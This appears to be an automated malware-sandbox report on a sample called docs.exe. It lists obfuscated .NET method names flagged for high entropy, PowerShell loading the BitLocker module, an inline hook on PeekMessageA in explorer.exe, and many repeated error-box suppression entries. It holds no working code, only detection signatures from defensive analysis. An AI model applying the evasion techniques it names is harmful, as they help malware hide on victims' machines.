          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, aqVL7cOYT5UyxcIhT9.csHigh entropy of concatenated method names: 'VlcNITTaM', 'P0qGaSCiS', 'wMOT4WKl9', 'II1j4h3P7', 'Apxtg2a0r', 'sUoUWtidq', 'xJC3XUdxdof3RiglQw', 'zrPYEvRjV0CmWOhGjB', 'gKFEZ4oWw', 'SDlvDmYoo'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, IOx5x401yRp3CI6OJ3d.csHigh entropy of concatenated method names: 'M78hlYP6Y6', 'pfRhV5owIT', 'JfShNyPEUX', 'xqOhGdrAHx', 'qqehbF3nkK', 'klghT0d7pp', 'Dh3hjLN0kp', 'rfwhuEs08W', 'QkbhtLNbVL', 'EWDhUmTHlZ'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, VlBf5Ft4kYSmppGMuQ.csHigh entropy of concatenated method names: 'aZX4G9ZEYh', 'yqu4TCwedR', 'aNo4uXFpKK', 'h3s4tRPnc3', 'D8x4SNAbvR', 'gpc4yM2x9T', 'wr14IbVYvv', 'Hj04Ew0y6q', 'x6F4hwJtch', 'RmV4vv6TV6'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, LDZDcM2Nou0J0HoJor.csHigh entropy of concatenated method names: 'GJm8ltcUyg', 'Jaw8VtiUZK', 'FYM8N9BOCb', 'MsM8GU1b0K', 'i3a8bOVUSI', 'IZn8TFT8bX', 'fTB8jMVS28', 'VIO8uoLSx3', 'hZp8tkQEoS', 'YVA8UEcHnw'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, sU5tktntM79GAr8EnK.csHigh entropy of concatenated method names: 'IxjEJpnk9D', 'zgcE3Zw03y', 'LA2E4a2vE9', 'xAEE6IJglF', 'ApHEMlGyZE', 'qPnE8nqrHL', 'uK7Ee5sg6n', 'WrXEZbLhvp', 'kMcEYoD4HR', 'uTZEsTDxaH'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, PoDc7m9h94cvcn0ZZT.csHigh entropy of concatenated method names: 'V3U8JSkWAp', 'a4g84Mbqan', 'a6b8MtD2Nv', 'G4NMF4v5DR', 'jRnMz8Y1Gt', 'x9n81igeAP', 'dSp80dMhog', 'zhg8OWZeP9', 'cT38iojRfB', 'pwH8dx43nJ'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, vFnIq0XyLTVKbyTxHh.csHigh entropy of concatenated method names: 'OO49aPoiMdkk6EJwrBN', 'KXq1Z6oc8CZb9RIfiBO', 'o1UMELJsxu', 'lFUMh0SpBO', 'UKiMvHfbmx', 'ck5K7ToEk7gjam7vCAn', 'PfDXVdowmlcYpfUpZsL'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, G756Xyz9v7pHqk8kgU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D1AhKjQO4n', 'fs6hSTg3qR', 'Vm0hyCfL4Y', 'wEdhIikxkG', 'YynhE0wnWy', 'uHHhhpOudh', 'fddhv5PCNA'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, VWcrTg4qwlTNKDbRFr.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MX5OrbWC0W', 'rhVOFt42Al', 'eTuOzvKAbN', 'KfCi1YelNG', 'n0Vi0jerov', 'GUxiOjWN8f', 'wwTiiudnJg', 'dmYyoP4prIsX42KIOcj'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, af84IndmRovVmUbgp4.csHigh entropy of concatenated method names: 'fYo08SRLTv', 'Jud0eq6gGe', 'Y4k0YYSmpp', 'AMu0sQ02LS', 'pyd0SBy9Pw', 'PrZ0yTjgk2', 'IKUJh8ICV2PKML3hZS', 'sJQLJ9qhfJrY8S1L79', 'YMB007nipX', 'WPQ0ik4mie'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, qXH2vA5WHQSuKjXZcj.csHigh entropy of concatenated method names: 'l8pInyRaIh', 'O44IFoQAbZ', 'PYlE1fCg5u', 'RMSE0rg8ED', 'wQrIQE9lE0', 'lMLIa7dv0X', 'lnbIAdHehP', 'ao5IxiccZk', 'gjcIqkFdMS', 'VKdICdxRM0'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, LPwarZWTjgk2MRtSIP.csHigh entropy of concatenated method names: 'VqJMpsty79', 'YZrM35CrMK', 'LJFM6LrvMi', 'zktM8Sm4Tg', 'fRWMeajOTO', 'zYn6Dut7VM', 'UXs65ppXy5', 'uNO6gJWbO9', 'AUH6nAEdpe', 'jJT6r2GiVq'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, b2LSPYUHa0fFByydBy.csHigh entropy of concatenated method names: 'TxT6bMGgSX', 'YnX6jUikFA', 'Eac4kMsVQX', 'CBs4BxrwV4', 'u1d4mK3uSn', 'Lpi4LfYYdg', 'fc449mn6jj', 'QTp4w4XyBe', 'ACa42RxFhB', 'wnd4HVH5ep'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, W0CO6nx2lbf45N3dZB.csHigh entropy of concatenated method names: 'FyeSHy7wOY', 'PPnSaJ1JJc', 'PmkSx4D3VE', 'ADDSq7VDix', 'oygSXmHHB8', 'DrbSkbtbqM', 'mxeSBtV43o', 'EbRSm9wnxa', 'QVtSLfYees', 'F2dS95MGMW'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, gvZomwe6c5cc4pjo9P.csHigh entropy of concatenated method names: 'dTvipCo47p', 'XU7iJM33cp', 'Grbi3tdaMX', 'IyFi4dpTkd', 'HZFi6tHkmI', 'IRAiMVjBI6', 'P7Mi860EgN', 'fQUieBZaJZ', 'HHiiZdn7Gu', 'A88iYreIIk'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, QusdL9AWQuEDZLo2qk.csHigh entropy of concatenated method names: 'DgHKu8g4if', 'gJQKtp4MEd', 'eEQKWTZr40', 'hP7KXtcaO8', 'vSgKBKc5Y0', 'z5mKmnxyIJ', 'fDaK9bqd18', 'guLKw57hmH', 'Kx1KH893xF', 'P0OKQtgFCy'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, C382v4CSP1CfdGk3jL.csHigh entropy of concatenated method names: 'ToString', 'ShLyQDWB75', 'kucyXA7cLE', 'KK6ykwWp79', 'gxRyBREn2w', 'TNhym7Uks1', 'PiJyLa7jSa', 'mTPy95KASi', 'XYIywWJQkX', 'pL7y2uf49l'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, xOJxjE3K2SamCagQoj.csHigh entropy of concatenated method names: 'Dispose', 'vPS0rXSqae', 'ECbOXPH9c4', 'JNdnnpC6YC', 'DhU0F5tktt', 'j790zGAr8E', 'ProcessDialogKey', 'XK9O1BA7Yf', 'cHKO0ADt4q', 'TvGOOHKABq'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, NKABqoFswAiiVih8OX.csHigh entropy of concatenated method names: 'SFph0TKJgS', 'fBbhiJeAdS', 'oMFhdd7P1K', 'yLXhJJdKHO', 'GVSh3QUaEt', 'upkh62rbwp', 'JUyhMe40Fc', 'CvvEgBd72s', 'fe0EnSXsXM', 'r2OErvta3G'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, WcvWMqPxe6glMxDFWx.csHigh entropy of concatenated method names: 'iKRIYnvWGk', 'sH8IsAX9Zt', 'ToString', 'a0RIJmDKij', 'Cw4I3rJdhv', 'qjvI4n4j7u', 'GljI6ipwLj', 'UVvIMjVErL', 'dGwI80qXCR', 'xWKIeTWRNM'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, uSRLTvumudq6gGeKK7.csHigh entropy of concatenated method names: 'tHH3xKyoEn', 'wVM3qeFfto', 'MT63CTSNBS', 'rRE3PqcZOI', 'IAt3DjcHA3', 'GiK352som4', 'bTV3gHHbrU', 'FD13nNawND', 'OsE3ryFAIO', 'bpQ3FNKhvZ'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, LBA7YfrOHKADt4qPvG.csHigh entropy of concatenated method names: 'zjkEW3rcyB', 'wl5EXEeuHH', 'TSMEkAPVnC', 'QTaEBxrcyh', 'MgeExtGkXA', 'wwiEmIeH4I', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, aqVL7cOYT5UyxcIhT9.csHigh entropy of concatenated method names: 'VlcNITTaM', 'P0qGaSCiS', 'wMOT4WKl9', 'II1j4h3P7', 'Apxtg2a0r', 'sUoUWtidq', 'xJC3XUdxdof3RiglQw', 'zrPYEvRjV0CmWOhGjB', 'gKFEZ4oWw', 'SDlvDmYoo'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, IOx5x401yRp3CI6OJ3d.csHigh entropy of concatenated method names: 'M78hlYP6Y6', 'pfRhV5owIT', 'JfShNyPEUX', 'xqOhGdrAHx', 'qqehbF3nkK', 'klghT0d7pp', 'Dh3hjLN0kp', 'rfwhuEs08W', 'QkbhtLNbVL', 'EWDhUmTHlZ'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, VlBf5Ft4kYSmppGMuQ.csHigh entropy of concatenated method names: 'aZX4G9ZEYh', 'yqu4TCwedR', 'aNo4uXFpKK', 'h3s4tRPnc3', 'D8x4SNAbvR', 'gpc4yM2x9T', 'wr14IbVYvv', 'Hj04Ew0y6q', 'x6F4hwJtch', 'RmV4vv6TV6'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, LDZDcM2Nou0J0HoJor.csHigh entropy of concatenated method names: 'GJm8ltcUyg', 'Jaw8VtiUZK', 'FYM8N9BOCb', 'MsM8GU1b0K', 'i3a8bOVUSI', 'IZn8TFT8bX', 'fTB8jMVS28', 'VIO8uoLSx3', 'hZp8tkQEoS', 'YVA8UEcHnw'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, sU5tktntM79GAr8EnK.csHigh entropy of concatenated method names: 'IxjEJpnk9D', 'zgcE3Zw03y', 'LA2E4a2vE9', 'xAEE6IJglF', 'ApHEMlGyZE', 'qPnE8nqrHL', 'uK7Ee5sg6n', 'WrXEZbLhvp', 'kMcEYoD4HR', 'uTZEsTDxaH'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, PoDc7m9h94cvcn0ZZT.csHigh entropy of concatenated method names: 'V3U8JSkWAp', 'a4g84Mbqan', 'a6b8MtD2Nv', 'G4NMF4v5DR', 'jRnMz8Y1Gt', 'x9n81igeAP', 'dSp80dMhog', 'zhg8OWZeP9', 'cT38iojRfB', 'pwH8dx43nJ'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, vFnIq0XyLTVKbyTxHh.csHigh entropy of concatenated method names: 'OO49aPoiMdkk6EJwrBN', 'KXq1Z6oc8CZb9RIfiBO', 'o1UMELJsxu', 'lFUMh0SpBO', 'UKiMvHfbmx', 'ck5K7ToEk7gjam7vCAn', 'PfDXVdowmlcYpfUpZsL'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, G756Xyz9v7pHqk8kgU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D1AhKjQO4n', 'fs6hSTg3qR', 'Vm0hyCfL4Y', 'wEdhIikxkG', 'YynhE0wnWy', 'uHHhhpOudh', 'fddhv5PCNA'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, VWcrTg4qwlTNKDbRFr.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MX5OrbWC0W', 'rhVOFt42Al', 'eTuOzvKAbN', 'KfCi1YelNG', 'n0Vi0jerov', 'GUxiOjWN8f', 'wwTiiudnJg', 'dmYyoP4prIsX42KIOcj'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, af84IndmRovVmUbgp4.csHigh entropy of concatenated method names: 'fYo08SRLTv', 'Jud0eq6gGe', 'Y4k0YYSmpp', 'AMu0sQ02LS', 'pyd0SBy9Pw', 'PrZ0yTjgk2', 'IKUJh8ICV2PKML3hZS', 'sJQLJ9qhfJrY8S1L79', 'YMB007nipX', 'WPQ0ik4mie'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, qXH2vA5WHQSuKjXZcj.csHigh entropy of concatenated method names: 'l8pInyRaIh', 'O44IFoQAbZ', 'PYlE1fCg5u', 'RMSE0rg8ED', 'wQrIQE9lE0', 'lMLIa7dv0X', 'lnbIAdHehP', 'ao5IxiccZk', 'gjcIqkFdMS', 'VKdICdxRM0'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, LPwarZWTjgk2MRtSIP.csHigh entropy of concatenated method names: 'VqJMpsty79', 'YZrM35CrMK', 'LJFM6LrvMi', 'zktM8Sm4Tg', 'fRWMeajOTO', 'zYn6Dut7VM', 'UXs65ppXy5', 'uNO6gJWbO9', 'AUH6nAEdpe', 'jJT6r2GiVq'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, b2LSPYUHa0fFByydBy.csHigh entropy of concatenated method names: 'TxT6bMGgSX', 'YnX6jUikFA', 'Eac4kMsVQX', 'CBs4BxrwV4', 'u1d4mK3uSn', 'Lpi4LfYYdg', 'fc449mn6jj', 'QTp4w4XyBe', 'ACa42RxFhB', 'wnd4HVH5ep'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xED
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
